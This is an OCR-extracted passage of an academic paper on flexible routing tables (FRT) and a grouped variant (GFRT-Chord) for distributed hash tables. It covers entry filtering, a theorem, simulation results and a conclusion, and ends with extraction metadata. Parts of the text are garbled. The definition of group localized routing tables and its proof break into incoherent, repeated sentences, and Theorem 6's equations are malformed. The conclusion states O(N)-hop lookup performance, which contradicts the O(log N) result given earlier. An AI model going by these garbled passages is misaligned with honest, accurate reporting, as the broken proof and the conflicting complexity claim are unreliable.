Grouped FRT (GFRT) is an extension of FRT. GFRT reflects node groups in routing tables at each node $x$ by adding a policy to preferentially keep entries belonging to the same group as $x$ in the routing table. GFRT-Chord achieves reduction of hops between nodes belonging to different node groups while keeping path lengths short. For instance, we can reduce communications over ISPs or data centers by configuring them as node groups. In GFRT, each node $x$ belongs to a node group $x$.group, and a group identifier is attached to a node identifier, and thus each entry $e$ has node group information as $e$.group.
Like FRT-Chord, GFRT-Chord also consists of three parts, guarantee of reachability, entry leaning, and entry filtering. It uses the same methods for guarantee of reachability and entry learning, and is characterized by its method for entry filtering.
1) Entry Filtering: GFRT-Chord maintains a group successor list and a group predecessor in a similar way to FRT-Chord. The group successor list and the group predecessor at a node $s$ means a successor list and a predecessor respectively in a network limited to nodes belonging to the same group as $s$. In GFRT-Chord, therefore, sticky entries are a successor list, a predecessor, a group successor list, and a group predecessor.
We define the following variables for the routing table $E = \{e_i\}$ at a node $s$ (see Fig.6).
- $E_G = \{e \in E | e$.group $= s$.group\}.
- $E_{\bar{G}} = \{e \in E | e$.group $\neq s$.group\}.
- $e_o$ is the nearest entry in $E_G$ from $s$.
- $e_f$ is the farthest entry in $E_{\bar{G}}$ from $s$.
- $E_{near} = \{e_i \in E | d(s,e_i) < d(s,e_o)\}.
- E_{far} = \{e_i \in E | d(s,e_i) \leq d(s,e_o) < d(s,e_{|E|})\}.
- E_{leap} = E_{far} \cap E_{G}.
Using the variables defined above, GFRT-Chord performs entry filtering as follows:
1) Substitute $E_G$ into $C$ if $E_{leap} \neq \emptyset$, otherwise substitute $E$ into $C$.
2) Remove sticky entries from $C$.
3) Select the entry $e_i^*$ from $C$ that minimizes $\{S_i^{E-1} + S_i^{E}\}$.
As above, entry filtering in GFRT-Chord consists of the filtering steps in FRT-Chord with the addition of only one step. The step 1) in particular represents the policy of preferentially maintaining entries belonging to the same group. The other two steps are the same as those in FRT-Chord, and these steps refine the routing table according to the order $\leq 1D$. Thus, GFRT-Chord reflects node identifiers in routing table construction after reflecting node groups. In this way, all filtering steps in GFRT-Chord simultaneously reflect node identifiers and node groups.
From this, for convenience we set the length of successor lists and group successor lists as 1. Theorem 6 holds as in FRT-Chord.
**Theorem 6:** Let $E^* = E \setminus \{e_i\}$ be a routing table filtered by removing $e_i$, according to the filtering operation of GFRT-Chord. For any entry $e_i$ other than sticky entries, (30) and (31) hold.
\[
\frac{|E_{far}^*| - |E_{leap}^*|}{|E_{far}^*|} \geq \frac{|E_{far}| - |E_{leap}|}{|E_{far}|} \leq 1D \quad E \setminus \{e_i\}
\]
**Proof:** We will prove Theorem 6 in two parts.
1) When $E_{leap} = \emptyset$, (30) holds. (31) also holds because we can apply the proof of Theorem 3.
2) When $E_{leap} \neq \emptyset$, since GFRT-Chord selects an entry $e_i^*$ from $E_{far}$ if and only if $e_i^* \in E_{leap}$ according to the first step in entry filtering, $|E_{far}|$ decreases by one if and only if $|E_{leap}|$ decreases by one. So, $|E_{far}|$ will not decrease by one without removing an entry from $E_{leap}$. Thus, (30) holds. (31) also holds because we can apply the proof in Theorem 3 under the restriction of the first step.
In Theorem 6, each of (30) and (31) means that the entry filtering reflects both node groups according to the ratio of the entries belonging to the same group as $s$ and node identifiers according to the order $\leq 1D$. Therefore, Theorem 6 represents a consideration of node groups and node identifiers simultaneously.
We define a group localized routing table at a node $s$ as follows:
**Definition 4:** Let $E$ be a group localized routing table at a node $s$ belonging to a group $G_s$. When the node forwards a
definition of the group localized routing table \( G \) belonging to a group other than \( v \). Let \( v \) belonging to \( v \) group localized routing table \( a \) node \( v \) belonging to \( v \) group = \( \{ k \} \). We assume that \( k < j \) and \( G \) is in a range from \( v \) to \( t \). Therefore, the path length is \( O(\log N) \) times by similar logic to the proof of Theorem 5.
Thus, the forwarding takes \( O(\log N) \) times by similar logic to the proof of Theorem 5.
Therefore, the path length is \( O(\log N) \) times by similar logic to the proof of Theorem 5.
B. Extendibility of FRT
We can easily design such extended algorithms because FRT offers us a simple way to reflect node identifiers in the design methodology composed of three steps, guarantee of reachability, entry leaning, and entry filtering, by defining a total order \( \leq_{ID} \) on the routing table set. It is important that FRT replaces consideration of how we should construct routing tables with consideration of what entries we should remove from the routing table. In the rest of this section, we will demonstrate the extendibility of FRT by taking GFRT-Chord as an example.
Proc. 11th IEEE Int'l Conf. on Peer-to-Peer Computing (IEEE P2P’11), pp.72-81, August 2011
When we designed GFRT-Chord, we first decided to maintain some nodes in the routing table, such as the successor list, the predecessor, the group successor list, and the group predecessor. These are the sticky entries. DHTs often define exceptional entries to maintain in order not only to guarantee reachability but also to achieve fault tolerance, localize communications, or replicate data efficiently. FRT is designed to not interfere with such constraints for a routing table with sticky entries and offers a way to exclude these entries through entry filtering. No matter what entries we define as sticky entries, entry filtering can reflect node identifiers because the order on routing tables can be applied to any subset of the routing table set.
When we designed GFRT-Chord, we adopted the policy that it is better for a routing table at a given node to maintain more nodes belonging to the same group as that node. Factors we wish to introduce into routing algorithms are often independent of node identifiers because node identifiers are determined without regard of node characteristics, yet we must integrate such factors and node identifiers into an algorithm. FRT facilitates resolution of this difficulty. FRT converts rigid data structures that are hard to deal with into a single routing table by defining the order $\leq_{ID}$ on candidates for the routing table. As a result, we can easily introduce factors other than node identifiers into routing algorithms by considering not how to keep better combinations of node identifiers but how nodes should be maintained based on the factors.
On the other hand, it is not always true that path lengths accurately represent routing efficiency, due to factors other than node identifiers. Rather, node identifiers should be maximally reflected in routing tables after sufficient reflection of other factors. FRT provides the ability to do this by detachment of the concerns of node identifiers from data structures, i.e. routing tables in the form of an order $\leq_{ID}$. This way, we can reflect node identifiers in routing tables with sufficient reflection of other factors.
V. EVALUATION
We implemented FRT-Chord on Overlay Weaver [16], [17], an overlay construction toolkit, and performed experiments.
A. Entry Learning and Entry Filtering in FRT-Chord
Here we will show that routing tables will approach the best routing table by entry learning and entry filtering, and confirm the effectiveness of transferring at join and active learning lookups.
In the experiments, the routing table size $L$ is 80 and $n$ is 160. We successively sent $10^5$ queries, each query being sent to a randomly chosen key by a randomly chosen node in a system with $N = 10^4$ nodes. Next, we added a single node to the system and had it send $10^2$ queries to a randomly chosen key or according to active learning lookups. We adopted an iterative style to route queries in all experiments, like EpiChord [9]. In this method, the first node on a path forwards queries by repeatedly referring current nodes to next nodes.
We varied whether each joining node receives an entire routing table from a successor (transferring at join) or not, and recorded node identifiers of entries in a routing table at the last joined node. We plotted $\log d(s, e_i)$, the logarithmic distance from the node to each entry in its routing table after 25 queries and 100 queries, using its best routing table as a guide (Fig.7, Fig.8). The closer the graph of an experimental routing table is to the best routing table, the better its learning method. Fig.7 and Fig.8 show that routing tables approach the best routing table through repeated entry learning and entry filtering.
Fig.7 and Fig.8 also show that transferring at join and active learning lookups perform well because the routing tables without them are quite different from their best routing table. By comparing routing table learning only by random lookups to routing table learning by transferring at join along with random lookups, we can see that transferring at join is effective. This is because the node learns more entries by transferring from the successor in joining, and the best routing table for a node is similar to the best routing table of its successor. On the other hand, we can also see that even if a routing table does not obtain entries through a transfer at join, the routing table can still approach the best routing table through active learning lookups.
When we compare Fig.7 to Fig.8, we can see that routing tables with active learning lookups approach the best routing table more quickly than the others. This means that active learning lookups are efficient for learning as compared with random lookups.
These results show that transferring at join and active learning lookups work efficiently for learning, and entry filtering also works as expected.
B. Learning and Path Lengths in FRT-Chord
After \( N \) nodes join an FRT-Chord system, we repeat sending a query 50\( N \) times, where each query is sent to a randomly chosen key by a randomly chosen node. This means that the average number of queries sent by a node is 50. We vary the number of nodes \( N \) and the routing table size \( L \) and we set the length of the successor list as 4.
Fig.9 indicates the average path lengths for every \( N \) queries. This figure shows that repeating lookups shortens the average path lengths. The number of lookups shortens the path lengths at almost the same range for every node, regardless of the number of nodes in the system. Thus, under FRT-Chord the system is able to scale at entry learning and entry filtering.
C. Path Lengths and the Number of Nodes in FRT-Chord
We varied \( N \) and \( L \), and measured how path lengths change with greatly refined routing tables. Fig.10a and Fig.10b plot the average and the 99th percentile of path lengths. These figures show that FRT-Chord achieves \( O(\log N) \)-hop lookup performance, as described by Theorem 5. We can confirm that we are able to tune the trade-off between \( L \) and path lengths. When \( L > N \) \((N = 10^2, L = 160)\), routing tables have all nodes in the system and FRT-Chord achieves \( O(1) \)-hop lookup performance.
D. Path Lengths in GFRT-Chord
We also implemented GFRT-Chord on Overlay Weaver. Experiments with the implementation showed that average path lengths grow slightly as compared with FRT-Chord.
\( N \) nodes joined the system and nodes were composed of \(|G|\) groups. Each group had \( N/|G| \) nodes. Each node repeated an active learning lookup 500 times. The variables, \( N \), \(|G|\), and \( L \) are parameterized. The successor list length and the group successor list length were set as 4.
Fig.11a and Fig.11b plot average path lengths and average group path length. A group path length is the number of hops between two nodes belonging to different groups in a path, and thus a group path length is smaller than a path length.
In Fig.11a and Fig.11b, average path lengths in GFRT-Chord are larger than in FRT-Chord. This is because the routing table construction in GFRT-Chord is taken with the restriction of node groups, unlike FRT-Chord. In every situation, however, they differ slightly from each other, because the restriction of node groups in GFRT-Chord is not overly rigid and FRT is able to balance node identifier considerations and node group considerations in parallel. For example, for \(|G| = 10 \) and \( L = 20 \), when \( N = 10^2 \) each node group has only 10 nodes and the routing table at most includes only 10 nodes belonging to the same group. GFRT-Chord does not try to maintain the ratio of same group entries to other entries, but it uses the rest of the routing table at maximum and refines the entries according to the order \( \leq 1D \). GFRT-Chord therefore experiences only 1% path length growth, while attaining a 22% group path length decrease. Such percentages in path lengths growth and group path length decrease are not particularly important. This experiment shows that path lengths do not become overly large due to consideration of node groups in spite of the small number of nodes belonging to the same group. On the other hand, when \( N = 10^3 \) each node group has 100 nodes. GFRT-Chord is therefore able to choose entries belonging to the same group from a number of entry candidates according to the order \( \leq 1D \), and it treats entries not belonging to the same group like-wise. In this situation, therefore, GFRT-Chord also achieves only 6% path length growth, while decreasing group path length by 38%.
VI. Conclusion
This paper proposed flexible routing tables (FRT), a method to design routing algorithms for overlay networks, and proposed FRT-Chord, an FRT-based DHT.
An FRT-based algorithm is able to reflect node identifiers in routing table construction without restrictions on routing table candidates by defining and referring to a total order \( \leq 1D \) on a routing table set.
To analyze FRT-Chord, we implemented and experimented on the algorithm, and showed that the routing table is efficiently refined as expected, and that the algorithm achieves \( O(N) \)-hop lookup performance in an \( N \)-node network and \( O(1) \)-hop lookup performance in a small network.
This paper also proposed Grouped FRT (GFRT), an extended method based on FRT to reflect node groups, and designed GFRT-Chord, a GFRT-based DHT.
Experiments on GFRT-Chord show that GFRT-Chord reduces the number of hops from one group to another while avoiding long path. It shows the extendability of FRT-based algorithms, in that GFRT-Chord reflects node identifiers and node groups simultaneously.
We are finishing design of FRT-Kademlia, an FRT-based DHT with an identifier space based on XOR metrics. In future, we will design more FRT-based DHTs and extend them to deal with real world problems in addition to node grouping.
References
Fig. 9. Change in average path length with the number of queries per node.
Fig. 10. Correlation between routing table size and path length.
Fig. 11. Average path length with average group path length (shaded portion).
|
{"Source-Url": "http://www.shudo.net/publications/201108-P2P11-FRT/nagao-P2P11-FRT.pdf", "len_cl100k_base": 10786, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 46508, "total-output-tokens": 12791, "length": "2e13", "weborganizer": {"__label__adult": 0.00034236907958984375, "__label__art_design": 0.000377655029296875, "__label__crime_law": 0.0003933906555175781, "__label__education_jobs": 0.0009174346923828124, "__label__entertainment": 0.0001474618911743164, "__label__fashion_beauty": 0.00018596649169921875, "__label__finance_business": 0.0005507469177246094, "__label__food_dining": 0.0003688335418701172, "__label__games": 0.0007648468017578125, "__label__hardware": 0.00197601318359375, "__label__health": 0.0006022453308105469, "__label__history": 0.0004317760467529297, "__label__home_hobbies": 0.00011116266250610352, "__label__industrial": 0.0006146430969238281, "__label__literature": 0.0003681182861328125, "__label__politics": 0.0003483295440673828, "__label__religion": 0.0005054473876953125, "__label__science_tech": 0.27294921875, "__label__social_life": 0.00012934207916259766, "__label__software": 0.0361328125, "__label__software_dev": 0.6806640625, "__label__sports_fitness": 0.0002930164337158203, "__label__transportation": 0.0005850791931152344, "__label__travel": 0.0002636909484863281}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 45199, 0.02141]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 45199, 0.71648]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 45199, 0.87553]], "google_gemma-3-12b-it_contains_pii": [[0, 5222, false], [5222, 10340, null], [10340, 15331, null], [15331, 20898, null], [20898, 25621, null], [25621, 30808, null], [30808, 32083, null], [32083, 36819, null], [36819, 43134, null], [43134, 45199, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5222, true], [5222, 10340, null], [10340, 15331, null], [15331, 20898, null], [20898, 25621, null], [25621, 30808, null], [30808, 32083, null], [32083, 36819, null], [36819, 43134, null], [43134, 45199, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 45199, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 45199, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 45199, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 45199, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 45199, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 45199, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 45199, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 45199, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 45199, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 45199, null]], "pdf_page_numbers": [[0, 5222, 1], [5222, 10340, 2], [10340, 15331, 3], [15331, 20898, 4], [20898, 25621, 5], [25621, 30808, 6], [30808, 32083, 7], [32083, 36819, 8], [36819, 43134, 9], [43134, 45199, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 45199, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-01
|
2024-12-01
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.